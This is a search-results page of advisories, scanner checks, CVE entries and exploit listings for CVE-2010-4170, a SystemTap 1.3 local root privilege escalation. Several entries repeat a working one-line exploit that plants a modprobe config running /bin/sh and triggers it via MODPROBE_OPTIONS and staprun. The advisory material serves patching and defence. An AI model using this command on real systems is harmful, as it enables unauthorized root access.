42 matches found
SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SystemTap MODPROBEOPTIONS Privilege Escalation', 'Description' = %q This module attempts to gain root privileges by exploiting a vulnerability in...
Oracle: Security Advisory (ELSA-2010-0894)
The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
systemtap - Local Root Privilege Escalation Vulnerability
No description provided by source. CVE-2010-4170 printf install uprobes /bin/sh exploit.conf; MODPROBEOPTIONS=-C exploit.conf staprun -u whatever RHEL Advisory: https://rhn.redhat.com/errata/RHSA-2010-0894.html...
Oracle Linux 5 / 6 : systemtap (ELSA-2010-0894)
The remote Oracle Linux 5 / 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2010-0894 advisory. - CVE-2010-4170 Tenable has extracted the preceding description block directly from the Oracle Linux security advisory. Note that Nessus has not...
Oracle Linux 4 : systemtap (ELSA-2010-0895)
From Red Hat Security Advisory 2010:0895 : Updated systemtap packages that fix one security issue are now available for Red Hat Enterprise Linux 4. The Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System CVSS base score,...
Scientific Linux Security Update : systemtap on SL4.x i386/x86_64
It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges. CVE-2010-4170 Note: On Scientific Linux 4, an attacker must be a member ...
Debian Security Advisory DSA 2348-1 (systemtap)
The remote host is missing an update to systemtap announced via advisory DSA 2348-1. OpenVAS Vulnerability Test $Id: deb23481.nasl 6612 2017-07-07 12:08:03Z cfischer $ Description: Auto-generated from advisory DSA 2348-1 systemtap Authors: Thomas Reinke Copyright: Copyright c 2012 E-Soft Inc...
Debian DSA-2348-1 : systemtap - several vulnerabilities
Several vulnerabilities were discovered in SystemTap, an instrumentation system for Linux : - CVE-2011-2503 It was discovered that a race condition in staprun could lead to privilege escalation. - CVE-2010-4170 It was discovered that insufficient validation of environment variables in staprun cou...
CentOS Update for systemtap CESA-2010:0894 centos5 i386
Check for the Version of systemtap OpenVAS Vulnerability Test CentOS Update for systemtap CESA-2010:0894 centos5 i386 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify ...
CentOS Update for systemtap CESA-2010:0894 centos5 i386
The remote host is missing an update for the SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription scriptxrefname:"URL",...
Fedora Update for systemtap FEDORA-2011-7289
Check for the Version of systemtap OpenVAS Vulnerability Test Fedora Update for systemtap FEDORA-2011-7289 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under th...
Fedora Update for systemtap FEDORA-2011-7289
The remote host is missing an update for the SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription scriptxrefname:"URL",...
CVE-2010-4170
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBEOPTIONS environment variable to specify a malicious configuration file...
CVE-2010-4170
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBEOPTIONS environment variable to specify a malicious configuration file...
CVE-2010-4170
CVE-2010-4170 affects SystemTap, where the staprun runtime does not properly sanitize the environment before invoking modprobe in version 1.3, enabling a local user to escalate privileges by setting MODPROBE_OPTIONS to point to a malicious configuration file. Public references document this issue...
CVE-2010-4170
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBEOPTIONS environment variable to specify a malicious configuration file...
Fedora Update for systemtap FEDORA-2010-17865
The remote host is missing an update for the SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription scriptxrefname:"URL",...
Local Root Privilege systemtap Escalation Vulnerability
Exploit for linux platform in category local exploits ======================================================= Local Root Privilege systemtap Escalation Vulnerability ======================================================= CVE-2010-4170 printf "install uprobes /bin/sh" exploit.conf;...
SystemTap - Local Privilege Escalation
CVE-2010-4170 printf "install uprobes /bin/sh" exploit.conf; MODPROBEOPTIONS="-C exploit.conf" staprun -u whatever RHEL Advisory: https://rhn.redhat.com/errata/RHSA-2010-0894.html...
Linux Systemtap Privilege Escalation
CVE-2010-4170 printf "install uprobes /bin/sh" exploit.conf; MODPROBEOPTIONS="-C exploit.conf" staprun -u whatever RHEL Advisory: https://rhn.redhat.com/errata/RHSA-2010-0894.html...